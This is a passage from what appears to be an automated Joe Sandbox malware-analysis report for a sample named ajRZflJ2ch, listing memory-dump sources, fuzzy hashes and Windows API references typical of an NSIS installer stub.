                                                                                                            • Instruction ID: 0062eccb9641fe269bcca0fca2c1bb0c912041b5774f7675d68d8ded032e5626
                                                                                                            • Opcode Fuzzy Hash: 166015495a6e402befdcd09ecbcd447ead4ab567ec16954271c72fba22c9eb8a
                                                                                                            • Instruction Fuzzy Hash: A5F01F74D05208CBDB04EFA9D9546EDBBB6EB8A301F50A529C804B2261DB3A9912CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7130d1a2a7f3325595565f6c8f84cdcbabf5e6b46a13c32723b93bf0b4150f1e
                                                                                                            • Instruction ID: ab3fccfd0915c226a42e32b0150033d276e923b062b5f81d875f2281c54f8690
                                                                                                            • Opcode Fuzzy Hash: 7130d1a2a7f3325595565f6c8f84cdcbabf5e6b46a13c32723b93bf0b4150f1e
                                                                                                            • Instruction Fuzzy Hash: A2F0E221B4C3801FF70262795451A6B2FBA5FC7A80F1A01BAD542C7656CE958C4553A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0ce32bf3e96df796ed0fddc054bfcd0d1acdb51899072b6f3d6f08e6d540ec83
                                                                                                            • Instruction ID: 965dcbfd24f34698203d77548c36680e50eb62d8a5252e86b77a33f32673aa66
                                                                                                            • Opcode Fuzzy Hash: 0ce32bf3e96df796ed0fddc054bfcd0d1acdb51899072b6f3d6f08e6d540ec83
                                                                                                            • Instruction Fuzzy Hash: 78F0A02234830557E60472AD5855B2B3AAEABC6A96B120436EA02D6254DFA5AC0553F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a95fd343c2fb4dab4197559f99703d01224113c626026af064a0794e61aeddc4
                                                                                                            • Instruction ID: dddce0f9d4b77e22c2c145986b195b5fde5878ce7b0541c999d273366b4340a3
                                                                                                            • Opcode Fuzzy Hash: a95fd343c2fb4dab4197559f99703d01224113c626026af064a0794e61aeddc4
                                                                                                            • Instruction Fuzzy Hash: BAF09835419F82AFF3116B34ACBC26A7F70FF4B313B996D95E08A86472DB684445CB10
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3c65a8fbd79f611ff620b1cd10b07b0059c25b7897d2dec3bf2ba508360f10fd
                                                                                                            • Instruction ID: da683ac269a9b8c97db4b3bbcaffc297d70abca78614ec0dc87d09e8b44e272f
                                                                                                            • Opcode Fuzzy Hash: 3c65a8fbd79f611ff620b1cd10b07b0059c25b7897d2dec3bf2ba508360f10fd
                                                                                                            • Instruction Fuzzy Hash: 42F08578D04208EFCB00DFB8D4486ACBFF0EB0A305F2081BAE805A3320E7314A45DB01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a93d4dfe44e94b458541b362a1182f33627cb11100edf35d3f8a6508b14a648a
                                                                                                            • Instruction ID: 64c003952f5f0d7d1b0295a5ac5d7232041684f5dc343f89822881293f220491
                                                                                                            • Opcode Fuzzy Hash: a93d4dfe44e94b458541b362a1182f33627cb11100edf35d3f8a6508b14a648a
                                                                                                            • Instruction Fuzzy Hash: EFE0E570819F82AFF7121B70AC6C26A7F70EB4B307B882989E44A92462C7680045CB01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 17c89a69acf20d3c3990bc98861a355d249daf6de09bf30798231f42e949bb7c
                                                                                                            • Instruction ID: fa2099199e43a7e9272273dcb020bdc345b6f00e0831ec2c7d46d006b9fbcb85
                                                                                                            • Opcode Fuzzy Hash: 17c89a69acf20d3c3990bc98861a355d249daf6de09bf30798231f42e949bb7c
                                                                                                            • Instruction Fuzzy Hash: 98E09A319103678ECB129BA09C040EEBB34FE83211B5682A3D410AB0A1FB701A49CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 256f211f9b4b999de4446bca5a1b2cc396e25716080a480971ac5100ba2d319c
                                                                                                            • Instruction ID: 0514921e997b968fec988ad5f2fe0e1ba3fa8eee6a31568956df943d981e273c
                                                                                                            • Opcode Fuzzy Hash: 256f211f9b4b999de4446bca5a1b2cc396e25716080a480971ac5100ba2d319c
                                                                                                            • Instruction Fuzzy Hash: 96E06574D04308EBCB04DFB8E4086ADBBF5AB49305F6080BA9809A3360E7308E81CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10020515b28732cea48cc21bc215441576601d753a0a33c2a9456738f6dda91c
                                                                                                            • Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
                                                                                                            • Opcode Fuzzy Hash: 10020515b28732cea48cc21bc215441576601d753a0a33c2a9456738f6dda91c
                                                                                                            • Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction ID: 6bfe9e4ddc3703fabb27178ed1c8188bd7b056dc6bdeb01e91e2ebab0192cb7f
                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction Fuzzy Hash: 0AC08C3320C2282AA234108FBC40EA7BB8CC3C53B4E31017BF92CC3300A8429C8011F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b111cdc37b80ac9cb682db2aa3de31f123284e78d710c23e1e294f254e8047c
                                                                                                            • Instruction ID: 2359d06a905001b80f0052c27adbf8a992975a428e8e1b85da0842039fe3760e
                                                                                                            • Opcode Fuzzy Hash: 0b111cdc37b80ac9cb682db2aa3de31f123284e78d710c23e1e294f254e8047c
                                                                                                            • Instruction Fuzzy Hash: 85E0C2314083844FCB12A774ECA66D83F32BBC1200F044664D4452A66FDF381606DB12
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ce9e41ed67deab1c93650b98fb14db9e17c6e78272c35204e566669d796750b
                                                                                                            • Instruction ID: abbba354d166c2df2b22b6467049d1afff72e4e984141dca42fd2d40cc83b0d1
                                                                                                            • Opcode Fuzzy Hash: 3ce9e41ed67deab1c93650b98fb14db9e17c6e78272c35204e566669d796750b
                                                                                                            • Instruction Fuzzy Hash: 6FD05E70C092489FD790CBA4B855BF9B778AF47301F0051EEE81A63660D7710D20DB51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 58573c093f07580a3d33b33514f5b59c2f29d12237147d2d5ba33c76c95bc45b
                                                                                                            • Instruction ID: 5ca02096158fc2eaf6100705dd0292352de140010382a47429bfe9b299631517
                                                                                                            • Opcode Fuzzy Hash: 58573c093f07580a3d33b33514f5b59c2f29d12237147d2d5ba33c76c95bc45b
                                                                                                            • Instruction Fuzzy Hash: 50D0673BB000089FDB149F99EC409DDF776FB98221B048116E915A3660C6319925DB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 315ce1473b14db1e9886afae9a3b8995b2d00db799ae84c4c769f16b46f51f3f
                                                                                                            • Instruction ID: e46fe84bbf66008652de9dc1950bf754b85d299bbb3881b463d81ff474ba7978
                                                                                                            • Opcode Fuzzy Hash: 315ce1473b14db1e9886afae9a3b8995b2d00db799ae84c4c769f16b46f51f3f
                                                                                                            • Instruction Fuzzy Hash: 56D05E2250E7D00FEB17D238A855488BF610CC652034946FBE498C71E2DA954A8A839A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8051062f857ec41bdca2ff2180dbe44eb70f8fa9c8dfcdb4f680ab4e33dc7700
                                                                                                            • Instruction ID: 594c7370ca7fb355a37455494f6f1f68bcd317d63d7a2b0872a0ec6e6d226da3
                                                                                                            • Opcode Fuzzy Hash: 8051062f857ec41bdca2ff2180dbe44eb70f8fa9c8dfcdb4f680ab4e33dc7700
                                                                                                            • Instruction Fuzzy Hash: C0C01233619B10079614A21CB84058E5F959DC5AA23518A37A805961145E505D4BC385
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d2c41def3e1654b2032b790e299eb641074db6a354ac5a55e912599267fb848a
                                                                                                            • Instruction ID: b14a9ec418e9201d118e6c187f3fb6bdbfdb15dbf010cf0d51005caca3a0fda6
                                                                                                            • Opcode Fuzzy Hash: d2c41def3e1654b2032b790e299eb641074db6a354ac5a55e912599267fb848a
                                                                                                            • Instruction Fuzzy Hash: 35D01270C0530DEFD754DFA4F805BAAB7BCEB47302F4051A9A40963260DB715D50D795
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f6c4e903e746f4aa904e67bca02e4f000b81fb9d45d7624880b7af6c05315416
                                                                                                            • Instruction ID: 7dddb84f5ebe5aa0b4d5a104a53619d87a63409d724f074c39531284aa665baa
                                                                                                            • Opcode Fuzzy Hash: f6c4e903e746f4aa904e67bca02e4f000b81fb9d45d7624880b7af6c05315416
                                                                                                            • Instruction Fuzzy Hash: 77C08CB4004F0A8BF2042F50BC1CB39B7B8F707303FC82E10E40C028308BB85414C684
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 716b246129e24c0236a8734a08fc35a97bbed81a1f4810104b0f368f8d376633
                                                                                                            • Instruction ID: 276ce532612d5cda48ad2156652a246b6e629a99df86a30c638d42918be4a25d
                                                                                                            • Opcode Fuzzy Hash: 716b246129e24c0236a8734a08fc35a97bbed81a1f4810104b0f368f8d376633
                                                                                                            • Instruction Fuzzy Hash: 31C04C302687088FE7409A5DDC84B653BACFF85F05F5059E1F5088BA26CB66FC049A46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 578c58e1c039eafe2ad7dc02d32a6e5baf4eddac55ae23ea493c35e40bec3814
                                                                                                            • Instruction ID: 6d50d86d322c9afce73450a22193f677b3ffc055186edf4700c8d947c5893e1d
                                                                                                            • Opcode Fuzzy Hash: 578c58e1c039eafe2ad7dc02d32a6e5baf4eddac55ae23ea493c35e40bec3814
                                                                                                            • Instruction Fuzzy Hash: CBC080300407184FD741F779EC56655376EB7C07017408530A40925A6FDF7C29469F95
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(00438800,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-334447862
                                                                                                            • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00437800,75572EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$\*.*
                                                                                                            • API String ID: 2035342205-351390296
                                                                                                            • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707337668.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2707312739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707353057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707367429.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2707393078.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
